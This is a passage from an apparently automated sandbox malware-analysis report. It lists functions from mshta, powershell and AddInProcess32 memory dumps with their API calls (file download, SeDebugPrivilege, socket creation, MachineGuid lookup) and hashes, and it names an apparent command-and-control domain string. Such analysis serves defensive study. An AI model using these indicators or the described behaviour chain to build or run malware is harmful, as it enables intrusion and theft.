Instruction Fuzzy Hash:

Function 02AF0FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.417424395.0000000002AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2af0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: e399129e48a0335aaac0554db5bea46f3af7e3dff27cdb45dc64c7837d9b8ee2
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 02AF0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.417424395.0000000002AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2af0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: e399129e48a0335aaac0554db5bea46f3af7e3dff27cdb45dc64c7837d9b8ee2
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 4008, Parent PID: 3868COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 000007FE899B4B18 Relevance: 1.6, APIs: 1, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE899B5AF0

Memory Dump Source

Source File: 00000006.00000002.457565932.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe899b0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 30b8ab4f51c219e7052957f59ea5faf73a70b48aaaeb12f770eab4cad72a21d7
Instruction ID: 70a912e6180708a489c5a413acad5a672dde47a77dba218a613ca7f1de2d922a
Opcode Fuzzy Hash: 30b8ab4f51c219e7052957f59ea5faf73a70b48aaaeb12f770eab4cad72a21d7
Instruction Fuzzy Hash: 32319131918A5C8FDB58EF5C98857A9B7E0FB59711F00822ED04EE3661CB74B806CB81

Function 000007FE899B59E1 Relevance: 1.7, APIs: 1, Instructions: 159
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE899B5AF0

Memory Dump Source

Source File: 00000006.00000002.457565932.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe899b0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
Instruction ID: 777315a8379273862214977f4159bba84b37a095e6150f6c079ad4062ad424ff
Opcode Fuzzy Hash: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
Instruction Fuzzy Hash: BB41F37181DB989FDB19EB589C447A9BBF0FB56321F04826FD08DD3162CB286806C782

Function 000007FE89A82CD9 Relevance: .7, Instructions: 711
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.457649059.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe89a80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9181fc450dd1d9f3f54f43a147fc2459dd250c0546bd44c3cf6bf6d8d9fdad0e
Instruction ID: cb0a7b1428736da19d699caaa54c50ccbca690ac3900cb0b11f7ced65c8c1076
Opcode Fuzzy Hash: 9181fc450dd1d9f3f54f43a147fc2459dd250c0546bd44c3cf6bf6d8d9fdad0e
Instruction Fuzzy Hash: 3A22E33090CB894FE799EB2C84506797FE2FF9A344F2401EAD48ED72A3DA25AC55C741

Function 000007FE89A80F62 Relevance: .3, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.457649059.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe89a80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e51087b5e6d19270a37c3ce3b1baf690697605a1ee9a9ed084576d8149c87b
Instruction ID: 2de710cf67d9c3487ce82f2aa8be1ee72a32694f73af03a704a46d2fb9d72646
Opcode Fuzzy Hash: 57e51087b5e6d19270a37c3ce3b1baf690697605a1ee9a9ed084576d8149c87b
Instruction Fuzzy Hash: 4291F220A1DBC90FE357933C58642657FE2EF5B254B2900EBC48EDB1A3DA189C5AC351

Non-executed Functions

Function 000007FE89A81E3D Relevance: .6, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.457649059.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe89a80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b2eb0a22f44f96154a1b6671dedf6ad8dc31d0988c5687c6fde187a28c1fa4
Instruction ID: c1c1283434fe51ddb164ecf0dee03d28af91562a7e6ea44ba4fd70f782db15ce
Opcode Fuzzy Hash: 01b2eb0a22f44f96154a1b6671dedf6ad8dc31d0988c5687c6fde187a28c1fa4
Instruction Fuzzy Hash: E7025120A1DBC90FE756A73858243B97FE0EF5A254F1801EBD49DD71A3DA18AC19C391

Analysis Process: AddInProcess32.exePID: 1488, Parent PID: 1224COMMON

Execution Graph

Execution Coverage:	32.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1845
Total number of Limit Nodes:	99

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Function 004061C3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _wmemset$AccountErrorInformationLastLookupToken
String ID: IDA$IDA
API String ID: 3235442692-2020647798
Opcode ID: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 0041284A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C

Strings

5,A, xrefs: 0041284A

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Path
String ID: 5,A
API String ID: 2875597873-3842761921
Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00404BEE Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessQueryValue
String ID:
API String ID: 3318767951-0
Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8

Function 00404056 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F

Memory Dump Source

Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFolderPathProcess
String ID:
API String ID: 398210565-0
Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

